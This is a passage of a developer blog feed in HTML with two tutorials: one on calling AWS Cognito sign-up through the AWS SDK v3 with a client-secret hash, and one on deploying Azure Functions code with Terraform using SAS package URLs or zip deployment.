</code></pre> </div> <p>See the example <code>res</code> variable value in the Amplify section above.</p> <p>If you try to use <code>amazon-cognito-identity-js</code> with an app client that has <em>Generate client secret</em> enabled, you will get this error:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="err">code:</span><span class="w"> </span><span class="err">'NotAuthorizedException'</span><span class="p">,</span><span class="w"> </span><span class="err">name:</span><span class="w"> </span><span class="err">'NotAuthorizedException'</span><span class="p">,</span><span class="w"> </span><span class="err">message:</span><span class="w"> </span><span class="err">'Unable</span><span class="w"> </span><span class="err">to</span><span class="w"> </span><span class="err">verify</span><span class="w"> </span><span class="err">secret</span><span class="w"> </span><span class="err">hash</span><span class="w"> </span><span class="err">for</span><span class="w"> </span><span class="err">client</span><span class="w"> </span><span class="mi">5</span><span class="err">cdgugg</span><span class="mi">1</span><span class="err">eko</span><span class="mi">9</span><span class="err">cm</span><span class="mi">7</span><span class="err">u</span><span class="mi">1</span><span class="err">u</span><span class="mi">3</span><span class="err">spnaf</span><span class="mi">37</span><span class="err">'</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <h2> Cognito AWS SDK </h2> <p>AWS SDK is as close to the cloud resources as you can get. It exposes all of the operations you can run in AWS. There are 2 versions of the AWS SDK in use currently: v2 and v3, and the way you import and use these differs. Examples below use v3 since it's already generally available.</p> <ul> <li>Does it work in the backend? Absolutely.</li> <li>On the frontend, you're probably better off using higher-level Amplify or <code>amazon-cognito-identity-js</code> since they provide better developer experience.</li> <li>Unlike 2 libraries above, AWS SDK supports secret-enabled Cognito app clients. <em>"Generate client secret"</em> can be checked in the app client settings.</li> <li>You can use admin-level Cognito APIs. Make sure AWS credentials (access key ID and secret key) are <a href="https://docs.aws.amazon.com/sdk-for-javascript/v3/developer-guide/setting-credentials.html">available</a> in the code.</li> </ul> <p><strong>When to use AWS SDK:</strong> when you need to access protected Cognito APIs that require developer credentials. AWS SDK is the way to go if you need communicate with a secret-enabled Cognito app client.</p> <h3> Use AWS SDK v3 on the server </h3> <p>The code below features an example usage of AWS SDK to create a new Cognito user with a request signed with the client secret.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="k">import</span> <span class="p">{</span> <span class="nx">CognitoIdentityProvider</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">@aws-sdk/client-cognito-identity-provider</span><span class="dl">'</span> <span class="k">import</span> <span class="nx">crypto</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">crypto</span><span class="dl">'</span> <span class="kd">const</span> <span class="nx">clientId</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">5cdgugg1eko9cm7u1u3spnaf37</span><span class="dl">'</span> <span class="kd">const</span> <span class="nx">clientSecret</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">7j3v7ag5avt2pegj45lad3f7f0lpdikhm2o6oiae9arii1pbqn0</span><span class="dl">'</span> <span class="kd">const</span> <span class="nx">email</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">max@maxivanov.io</span><span class="dl">'</span> <span class="kd">const</span> <span class="nx">password</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">12345678</span><span class="dl">'</span> <span class="p">;(</span><span class="k">async</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">params</span> <span class="o">=</span> <span class="p">{</span> <span class="na">ClientId</span><span class="p">:</span> <span class="nx">clientId</span><span class="p">,</span> <span class="na">Password</span><span class="p">:</span> <span class="nx">password</span><span class="p">,</span> <span class="na">Username</span><span class="p">:</span> <span class="nx">email</span><span class="p">,</span> <span class="na">SecretHash</span><span class="p">:</span> <span class="nx">hashSecret</span><span class="p">(</span><span class="nx">clientSecret</span><span class="p">,</span> <span class="nx">email</span><span class="p">,</span> <span class="nx">clientId</span><span class="p">),</span> <span class="na">UserAttributes</span><span class="p">:</span> <span class="p">[</span> <span class="p">{</span> <span class="na">Name</span><span class="p">:</span> <span class="dl">'</span><span class="s1">email</span><span class="dl">'</span><span class="p">,</span> <span class="na">Value</span><span class="p">:</span> <span class="nx">email</span><span class="p">,</span> <span class="p">},</span> <span class="p">],</span> <span class="p">}</span> <span class="kd">const</span> <span class="nx">provider</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">CognitoIdentityProvider</span><span class="p">({</span> <span class="na">region</span><span class="p">:</span> <span class="dl">'</span><span class="s1">us-east-1</span><span class="dl">'</span> <span class="p">})</span> <span class="k">try</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">res</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">provider</span><span class="p">.</span><span class="nx">signUp</span><span class="p">(</span><span class="nx">params</span><span class="p">)</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">Signup success. Result: </span><span class="dl">'</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">Signup fail. Error: </span><span class="dl">'</span><span class="p">,</span> <span class="nx">e</span><span class="p">)</span> <span class="p">}</span> <span class="p">})()</span> <span class="kd">function</span> <span class="nx">hashSecret</span><span class="p">(</span><span class="nx">clientSecret</span><span class="p">,</span> <span class="nx">username</span><span class="p">,</span> <span class="nx">clientId</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">crypto</span> <span class="p">.</span><span class="nx">createHmac</span><span class="p">(</span><span class="dl">'</span><span class="s1">SHA256</span><span class="dl">'</span><span class="p">,</span> <span class="nx">clientSecret</span><span class="p">)</span> <span class="p">.</span><span class="nx">update</span><span class="p">(</span><span class="nx">username</span> <span class="o">+</span> <span class="nx">clientId</span><span class="p">)</span> <span class="p">.</span><span class="nx">digest</span><span class="p">(</span><span class="dl">'</span><span class="s1">base64</span><span class="dl">'</span><span class="p">)</span> <span class="p">}</span> </code></pre> </div> <p>API response example (<code>res</code> variable in the code above):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"$metadata"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"httpStatusCode"</span><span class="p">:</span><span class="w"> </span><span class="mi">200</span><span class="p">,</span><span class="w"> </span><span class="nl">"requestId"</span><span class="p">:</span><span class="w"> </span><span class="s2">"64abc24c-1ff6-451e-a335-a61f89813acd"</span><span class="p">,</span><span class="w"> </span><span class="nl">"attempts"</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="nl">"totalRetryDelay"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"CodeDeliveryDetails"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"AttributeName"</span><span class="p">:</span><span class="w"> </span><span class="s2">"email"</span><span class="p">,</span><span class="w"> </span><span class="nl">"DeliveryMedium"</span><span class="p">:</span><span class="w"> </span><span class="s2">"EMAIL"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Destination"</span><span class="p">:</span><span class="w"> </span><span class="s2">"m***@m***.io"</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"UserConfirmed"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w"> </span><span class="nl">"UserSub"</span><span class="p">:</span><span class="w"> </span><span class="s2">"3c434ca4-14f9-4549-97f9-88b549a9b1e7"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <h3> Use AWS SDK v3 in the browser </h3> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="k">import</span> <span class="p">{</span> <span class="nx">CognitoIdentityProvider</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">@aws-sdk/client-cognito-identity-provider</span><span class="dl">'</span> <span class="kd">const</span> <span class="nx">region</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">us-east-1</span><span class="dl">'</span> <span class="kd">const</span> <span class="nx">clientId</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">658l7npr63jq5ohbk2gl2jvf6</span><span class="dl">'</span> <span class="p">;(</span><span class="k">async</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">form</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">querySelector</span><span class="p">(</span><span class="dl">'</span><span class="s1">.form</span><span class="dl">'</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">email</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">querySelector</span><span class="p">(</span><span class="dl">'</span><span class="s1">.email</span><span class="dl">'</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">password</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">querySelector</span><span class="p">(</span><span class="dl">'</span><span class="s1">.password</span><span class="dl">'</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">provider</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">CognitoIdentityProvider</span><span class="p">({</span> <span class="nx">region</span> <span class="p">})</span> <span class="nx">form</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="dl">'</span><span class="s1">submit</span><span class="dl">'</span><span class="p">,</span> <span class="k">async</span> <span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nx">event</span><span class="p">.</span><span class="nx">preventDefault</span><span class="p">()</span> <span class="kd">var</span> <span class="nx">params</span> <span class="o">=</span> <span class="p">{</span> <span class="na">ClientId</span><span class="p">:</span> <span class="nx">clientId</span><span class="p">,</span> <span class="na">Password</span><span class="p">:</span> <span class="nx">password</span><span class="p">.</span><span class="nx">value</span><span class="p">,</span> <span class="na">Username</span><span class="p">:</span> <span class="nx">email</span><span class="p">.</span><span class="nx">value</span><span class="p">,</span> <span class="na">UserAttributes</span><span class="p">:</span> <span class="p">[</span> <span class="p">{</span> <span class="na">Name</span><span class="p">:</span> <span class="dl">'</span><span class="s1">email</span><span class="dl">'</span><span class="p">,</span> <span class="na">Value</span><span class="p">:</span> <span class="nx">email</span><span class="p">.</span><span class="nx">value</span><span class="p">,</span> <span class="p">},</span> <span class="p">],</span> <span class="p">}</span> <span class="k">try</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">res</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">provider</span><span class="p">.</span><span class="nx">signUp</span><span class="p">(</span><span class="nx">params</span><span class="p">)</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">Signup success. Result: </span><span class="dl">'</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">Signup fail. Error: </span><span class="dl">'</span><span class="p">,</span> <span class="nx">e</span><span class="p">)</span> <span class="p">}</span> <span class="p">})</span> <span class="p">})()</span> </code></pre> </div> <p>API response will be identical to the one for requests originating from the server.</p> <p>AWS SDK HTTP request and response headers:</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--WMlRE_Qi--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/04/aws-cognito-amplify-vs-amazon-cognito-identity-js-vs-aws-sdk/aws-sdk-browser-http-headers.webp" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--WMlRE_Qi--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/04/aws-cognito-amplify-vs-amazon-cognito-identity-js-vs-aws-sdk/aws-sdk-browser-http-headers.webp" alt="AWS SDK HTTP request and response"></a></p> <p>HTTP request body:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"ClientId"</span><span class="p">:</span><span class="w"> </span><span class="s2">"658l7npr63jq5ohbk2gl2jvf6"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Password"</span><span class="p">:</span><span class="w"> </span><span class="s2">"12345678"</span><span class="p">,</span><span class="w"> </span><span class="nl">"UserAttributes"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"email"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Value"</span><span class="p">:</span><span class="w"> </span><span class="s2">"max@maxivanov.io"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">],</span><span class="w"> </span><span class="nl">"Username"</span><span class="p">:</span><span class="w"> </span><span class="s2">"max@maxivanov.io"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>HTTP response body:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"CodeDeliveryDetails"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"AttributeName"</span><span class="p">:</span><span class="w"> </span><span class="s2">"email"</span><span class="p">,</span><span class="w"> </span><span class="nl">"DeliveryMedium"</span><span class="p">:</span><span class="w"> </span><span class="s2">"EMAIL"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Destination"</span><span class="p">:</span><span class="w"> </span><span class="s2">"m***@m***.io"</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"UserConfirmed"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w"> </span><span class="nl">"UserSub"</span><span class="p">:</span><span class="w"> </span><span class="s2">"25f09095-ac18-4f1f-ac26-4c4039841cc1"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>You can see the JSON passed in the HTTP request and response is identical to those in the Amplify example. Which makes sense, since in the end all of the tools communicate with the AWS HTTP API.</p> <h2> References </h2> <ul> <li><a href="https://docs.amplify.aws/lib/auth/getting-started/q/platform/js">https://docs.amplify.aws/lib/auth/getting-started/q/platform/js</a></li> <li><a href="https://github.com/aws-amplify/amplify-js/tree/main/packages/amazon-cognito-identity-js">https://github.com/aws-amplify/amplify-js/tree/main/packages/amazon-cognito-identity-js</a></li> <li><a href="https://docs.aws.amazon.com/sdk-for-javascript/v3/developer-guide/welcome.html">https://docs.aws.amazon.com/sdk-for-javascript/v3/developer-guide/welcome.html</a></li> <li><a href="https://github.com/maximivanov/cognito-js-usage">https://github.com/maximivanov/cognito-js-usage</a></li> </ul> <h2> ... </h2> <p>You have 3 tools to work with Cognito in JavaScript. Assess the requirements and make the right choice!</p> <p><em>If you like this type of content you can <a href="https://twitter.com/max_v_i">follow me</a> on Twitter for the latest updates.</em></p> aws cognito node javascript Deploy Azure Functions code with Terraform Max Ivanov Sun, 28 Mar 2021 02:44:46 +0000 https://forem.com/maxivanov/deploy-azure-functions-code-with-terraform-1h8b https://forem.com/maxivanov/deploy-azure-functions-code-with-terraform-1h8b <p>For a step by step guide on <strong>provisioning cloud resources</strong> needed to run Azure Functions, check <a href="https://dev.to/deploy-azure-functions-with-terraform/">Deploy Azure Functions with Terraform</a>.</p> <p>This post focuses on how you can <strong>publish code to a function app</strong> with Terraform. Here, the deployed app is a hello-world Node.js function, but the process is language-agnostic.</p> <p>Using a package file is the <a href="https://docs.microsoft.com/en-us/azure/azure-functions/run-functions-from-deployment-package#benefits-of-running-from-a-package-file">recommended way</a> to run Azure Functions. When new code is uploaded, the switch is <strong>atomic</strong> (i.e. safe). Performance is better and cold starts are <strong>faster</strong>. It's <strong>easy to rollback</strong> to a previous deployment by pointing to the corresponding package.</p> <p>There are <strong>2 modes</strong> of package deployment: url and app service. We will see the benefits and limitations of both as well as how to implement them with Terraform. </p> <p>Code for Linux/Windows + Consumption/Premium configurations in <a href="https://github.com/maximivanov/publish-az-func-code-with-terraform">Github</a>.</p> <h2> Deploy from Package </h2> <p>In a nutshell, deploying from package means taking a package (zip file) and mounting its content to the read-only <code>/home/site/wwwroot</code> directory. </p> <p>Source package can be stored in a remote storage or be uploaded to the app service, in the <code>/home/data/SitePackages</code> directory.</p> <p>Deployment mode is dictated by the <code>WEBSITE_RUN_FROM_PACKAGE</code> app setting.</p> <h3> Package in a remote storage </h3> <p>Storage can be anything, as long as the package can be downloaded by the app service at runtime. That highlights a downside of this option - whenever the app is restarted, its zip has to be <strong>re-downloaded</strong> from the storage.</p> <p>The most common approach is to host the package in a Blob Storage and generate a <strong>SAS URL</strong>, granting limited access to the package via the function app configuration:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>WEBSITE_RUN_FROM_PACKAGE = URL with SAS </code></pre> </div> <p>That's another inconvenince of this deployment method: </p> <ul> <li>there's now a <strong>secret</strong> in the app settings to manage (can leak through configuration/state/app code) AND </li> <li>the SAS token may <strong>expire</strong> (the app won't be able to download the package and will fail to start)</li> </ul> <p>Also documentation states: </p> <blockquote> <p>When running a function app on Windows, the external URL option yields worse cold-start performance. When deploying your function app to Windows, you should set WEBSITE_RUN_FROM_PACKAGE to 1 and publish with zip deployment.</p> </blockquote> <p>On a good side, running from a package URL is <strong>well-supported</strong> by both Linux and Windows environments in both Consumption and Premium plans.</p> <h3> Package in app service </h3> <p>At deployment time, the package is uploaded to the <code>/home/data/SitePackages</code> directory. This directory also has a <code>packagename.txt</code> file which contains nothing but the name of the package that's currently in use. You can update the file manually to point to a different package and the function app will restart shortly and will use that package's code.</p> <p>To upload the package to app service, you should use the <a href="https://docs.microsoft.com/en-us/azure/azure-functions/deployment-zip-push">Zip Deployment</a> strategy combined with the app setting:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>WEBSITE_RUN_FROM_PACKAGE = 1 </code></pre> </div> <p>Without the app setting, zip deploy will simply extract the package to the <code>/home/site/wwwroot</code> directory loosing all benefits of run-from-package deployment.</p> <p>Since there's no need to download the package over the network when the function app starts, it should result in <strong>faster cold starts</strong>.</p> <p>Note that as of March 2021, <code>WEBSITE_RUN_FROM_PACKAGE = 1</code> is still not supported in <strong>Linux Consumption</strong>. Windows hosts and Linux Premium work fine with it though.</p> <h2> Deploy code with Terraform </h2> <p>To keep the post short I assume you have the basic Azure Functions Terraform script ready (as per this <a href="https://dev.to/deploy-azure-functions-with-terraform/">post</a>).</p> <p>Alternatively, refer to this post's <a href="https://github.com/maximivanov/publish-az-func-code-with-terraform">companion repository</a> for full configuration example in different environments.</p> <p>Now we can focus on what it takes to publish/upload the code to Azure.</p> <h3> <code>WEBSITE_RUN_FROM_PACKAGE = &lt;url&gt;</code> </h3> <p>There's a great article by <a href="https://adrianhall.github.io/typescript/2019/10/23/terraform-functions/">Adrian Hall</a> which describes the process of deploying the code from Azure Storage.</p> <p>I wanted to revisit the solution to highlight newer <code>azurerm_storage_account_blob_container_sas</code> Terraform resource as well as suggest compressing the code with Terraform without relying on npm. Simpler functions may not even use external modules, so it's good to <strong>not have Node.js and NPM as dependencies</strong> in the deployment environment.</p> <p>For both deployment modes, we need to <strong>compress the function code</strong> for it to be uploaded. For this, we can use the <code>archive_file</code> data type.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">data</span> <span class="s2">"archive_file"</span> <span class="s2">"file_function_app"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="s2">"zip"</span> <span class="nx">source_dir</span> <span class="p">=</span> <span class="s2">"../function-app"</span> <span class="nx">output_path</span> <span class="p">=</span> <span class="s2">"function-app.zip"</span> <span class="p">}</span> </code></pre> </div> <p><strong>Upload the archive</strong> to the Azure Storage Blob:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">resource</span> <span class="s2">"azurerm_storage_blob"</span> <span class="s2">"storage_blob"</span> <span class="p">{</span> <span class="nx">name</span> <span class="p">=</span> <span class="s2">"${filesha256(var.archive_file.output_path)}.zip"</span> <span class="nx">storage_account_name</span> <span class="p">=</span> <span class="nx">azurerm_storage_account</span><span class="err">.</span><span class="nx">storage_account</span><span class="err">.</span><span class="nx">name</span> <span class="nx">storage_container_name</span> <span class="p">=</span> <span class="nx">azurerm_storage_container</span><span class="err">.</span><span class="nx">storage_container</span><span class="err">.</span><span class="nx">name</span> <span class="nx">type</span> <span class="p">=</span> <span class="s2">"Block"</span> <span class="nx">source</span> <span class="p">=</span> <span class="nx">var</span><span class="err">.</span><span class="nx">archive_file</span><span class="err">.</span><span class="nx">output_path</span> <span class="p">}</span> </code></pre> </div> <p>Create a <strong>read-only SAS</strong> for the Blob. Mind the <strong>expiration date</strong> - past the date the function app scale out/restart operations will fail as the packge link won't work anymore. Using the <a href="https://docs.microsoft.com/en-us/azure/storage/common/storage-sas-overview#service-sas">Service SAS</a> is optimal here, as it provides limited access compared to the Account SAS generated by <code>azurerm_storage_account_sas</code>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">data</span> <span class="s2">"azurerm_storage_account_blob_container_sas"</span> <span class="s2">"storage_account_blob_container_sas"</span> <span class="p">{</span> <span class="nx">connection_string</span> <span class="p">=</span> <span class="nx">azurerm_storage_account</span><span class="err">.</span><span class="nx">storage_account</span><span class="err">.</span><span class="nx">primary_connection_string</span> <span class="nx">container_name</span> <span class="p">=</span> <span class="nx">azurerm_storage_container</span><span class="err">.</span><span class="nx">storage_container</span><span class="err">.</span><span class="nx">name</span> <span class="nx">start</span> <span class="p">=</span> <span class="s2">"2021-01-01T00:00:00Z"</span> <span class="nx">expiry</span> <span class="p">=</span> <span class="s2">"2022-01-01T00:00:00Z"</span> <span class="nx">permissions</span> <span class="p">{</span> <span class="nx">read</span> <span class="p">=</span> <span class="kc">true</span> <span class="nx">add</span> <span class="p">=</span> <span class="kc">false</span> <span class="nx">create</span> <span class="p">=</span> <span class="kc">false</span> <span class="nx">write</span> <span class="p">=</span> <span class="kc">false</span> <span class="nx">delete</span> <span class="p">=</span> <span class="kc">false</span> <span class="nx">list</span> <span class="p">=</span> <span class="kc">false</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p>Finally, provide full package URL in the <code>WEBSITE_RUN_FROM_PACKAGE</code> app setting:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">resource</span> <span class="s2">"azurerm_function_app"</span> <span class="s2">"function_app"</span> <span class="p">{</span> <span class="nx">name</span> <span class="p">=</span> <span class="s2">"${var.project}-function-app"</span> <span class="nx">resource_group_name</span> <span class="p">=</span> <span class="nx">azurerm_resource_group</span><span class="err">.</span><span class="nx">resource_group</span><span class="err">.</span><span class="nx">name</span> <span class="nx">location</span> <span class="p">=</span> <span class="nx">var</span><span class="err">.</span><span class="nx">location</span> <span class="nx">app_service_plan_id</span> <span class="p">=</span> <span class="nx">azurerm_app_service_plan</span><span class="err">.</span><span class="nx">app_service_plan</span><span class="err">.</span><span class="nx">id</span> <span class="nx">app_settings</span> <span class="p">=</span> <span class="p">{</span> <span class="s2">"WEBSITE_RUN_FROM_PACKAGE"</span> <span class="p">=</span> <span class="s2">"https://${azurerm_storage_account.storage_account.name}.blob.core.windows.net/${azurerm_storage_container.storage_container.name}/${azurerm_storage_blob.storage_blob.name}${data.azurerm_storage_account_blob_container_sas.storage_account_blob_container_sas.sas}"</span><span class="err">,</span> <span class="s2">"FUNCTIONS_WORKER_RUNTIME"</span> <span class="p">=</span> <span class="s2">"node"</span><span class="err">,</span> <span class="s2">"AzureWebJobsDisableHomepage"</span> <span class="p">=</span> <span class="s2">"true"</span><span class="err">,</span> <span class="p">}</span> <span class="nx">os_type</span> <span class="p">=</span> <span class="s2">"linux"</span> <span class="nx">site_config</span> <span class="p">{</span> <span class="nx">linux_fx_version</span> <span class="p">=</span> <span class="s2">"node|14"</span> <span class="nx">use_32_bit_worker_process</span> <span class="p">=</span> <span class="kc">false</span> <span class="p">}</span> <span class="nx">storage_account_name</span> <span class="p">=</span> <span class="nx">azurerm_storage_account</span><span class="err">.</span><span class="nx">storage_account</span><span class="err">.</span><span class="nx">name</span> <span class="nx">storage_account_access_key</span> <span class="p">=</span> <span class="nx">azurerm_storage_account</span><span class="err">.</span><span class="nx">storage_account</span><span class="err">.</span><span class="nx">primary_access_key</span> <span class="nx">version</span> <span class="p">=</span> <span class="s2">"~3"</span> <span class="p">}</span> </code></pre> </div> <p>That's it. Once you run <code>terraform apply</code>, it will prepare the package, upload it to the storage, generate the link and put it to the app setting. The function app will restart and in a few seconds your app will run the new code.</p> <h3> <code>WEBSITE_RUN_FROM_PACKAGE = 1</code> </h3> <p>Prepare the package zip:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">data</span> <span class="s2">"archive_file"</span> <span class="s2">"file_function_app"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="s2">"zip"</span> <span class="nx">source_dir</span> <span class="p">=</span> <span class="s2">"../function-app"</span> <span class="nx">output_path</span> <span class="p">=</span> <span class="s2">"function-app.zip"</span> <span class="p">}</span> </code></pre> </div> <p>Configure function app using the <code>WEBSITE_RUN_FROM_PACKAGE</code> setting to expect the package in the file system:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">resource</span> <span class="s2">"azurerm_function_app"</span> <span class="s2">"function_app"</span> <span class="p">{</span> <span class="nx">name</span> <span class="p">=</span> <span class="s2">"${var.project}-function-app"</span> <span class="nx">resource_group_name</span> <span class="p">=</span> <span class="nx">azurerm_resource_group</span><span class="err">.</span><span class="nx">resource_group</span><span class="err">.</span><span class="nx">name</span> <span class="nx">location</span> <span class="p">=</span> <span class="nx">var</span><span class="err">.</span><span class="nx">location</span> <span class="nx">app_service_plan_id</span> <span class="p">=</span> <span class="nx">azurerm_app_service_plan</span><span class="err">.</span><span class="nx">app_service_plan</span><span class="err">.</span><span class="nx">id</span> <span class="nx">app_settings</span> <span class="p">=</span> <span class="p">{</span> <span class="s2">"WEBSITE_RUN_FROM_PACKAGE"</span> <span class="p">=</span> <span class="s2">"1"</span><span class="err">,</span> <span class="s2">"FUNCTIONS_WORKER_RUNTIME"</span> <span class="p">=</span> <span class="s2">"node"</span><span class="err">,</span> <span class="s2">"AzureWebJobsDisableHomepage"</span> <span class="p">=</span> <span class="s2">"true"</span><span class="err">,</span> <span class="p">}</span> <span class="nx">os_type</span> <span class="p">=</span> <span class="s2">"linux"</span> <span class="nx">site_config</span> <span class="p">{</span> <span class="nx">linux_fx_version</span> <span class="p">=</span> <span class="s2">"node|14"</span> <span class="nx">use_32_bit_worker_process</span> <span class="p">=</span> <span class="kc">false</span> <span class="p">}</span> <span class="nx">storage_account_name</span> <span class="p">=</span> <span class="nx">azurerm_storage_account</span><span class="err">.</span><span class="nx">storage_account</span><span class="err">.</span><span class="nx">name</span> <span class="nx">storage_account_access_key</span> <span class="p">=</span> <span class="nx">azurerm_storage_account</span><span class="err">.</span><span class="nx">storage_account</span><span class="err">.</span><span class="nx">primary_access_key</span> <span class="nx">version</span> <span class="p">=</span> <span class="s2">"~3"</span> <span class="p">}</span> </code></pre> </div> <p>The code will be pushed to the function app with Azure CLI command:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">locals</span> <span class="p">{</span> <span class="nx">publish_code_command</span> <span class="p">=</span> <span class="s2">"az webapp deployment source config-zip --resource-group ${azurerm_resource_group.resource_group.name} --name ${azurerm_function_app.function_app.name} --src ${var.archive_file.output_path}"</span> <span class="p">}</span> </code></pre> </div> <p>We use <code>null_resource</code> to run the publish command. Note it will be triggered every time the contents of the package file changes. If there's no change, the code won't be uploaded (makes sense!).<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">resource</span> <span class="s2">"null_resource"</span> <span class="s2">"function_app_publish"</span> <span class="p">{</span> <span class="nx">provisioner</span> <span class="s2">"local-exec"</span> <span class="p">{</span> <span class="nx">command</span> <span class="p">=</span> <span class="nx">local</span><span class="err">.</span><span class="nx">publish_code_command</span> <span class="p">}</span> <span class="nx">depends_on</span> <span class="p">=</span> <span class="p">[</span><span class="nx">local</span><span class="err">.</span><span class="nx">publish_code_command</span><span class="p">]</span> <span class="nx">triggers</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">input_json</span> <span class="p">=</span> <span class="nx">filemd5</span><span class="err">(</span><span class="nx">var</span><span class="err">.</span><span class="nx">archive_file</span><span class="err">.</span><span class="nx">output_path</span><span class="err">)</span> <span class="nx">publish_code_command</span> <span class="p">=</span> <span class="nx">local</span><span class="err">.</span><span class="nx">publish_code_command</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p>As you can see this method is simpler and as we discussed earlier it results in faster cold starts. So if you're not running on Linux Consumption, use this approach.</p> <h2> References </h2> <ul> <li><a href="https://docs.microsoft.com/en-us/azure/azure-functions/run-functions-from-deployment-package">https://docs.microsoft.com/en-us/azure/azure-functions/run-functions-from-deployment-package</a></li> <li><a href="https://docs.microsoft.com/en-us/azure/azure-functions/deployment-zip-push">https://docs.microsoft.com/en-us/azure/azure-functions/deployment-zip-push</a></li> <li><a href="https://github.com/Azure/app-service-announcements/issues/84">https://github.com/Azure/app-service-announcements/issues/84</a></li> <li><a 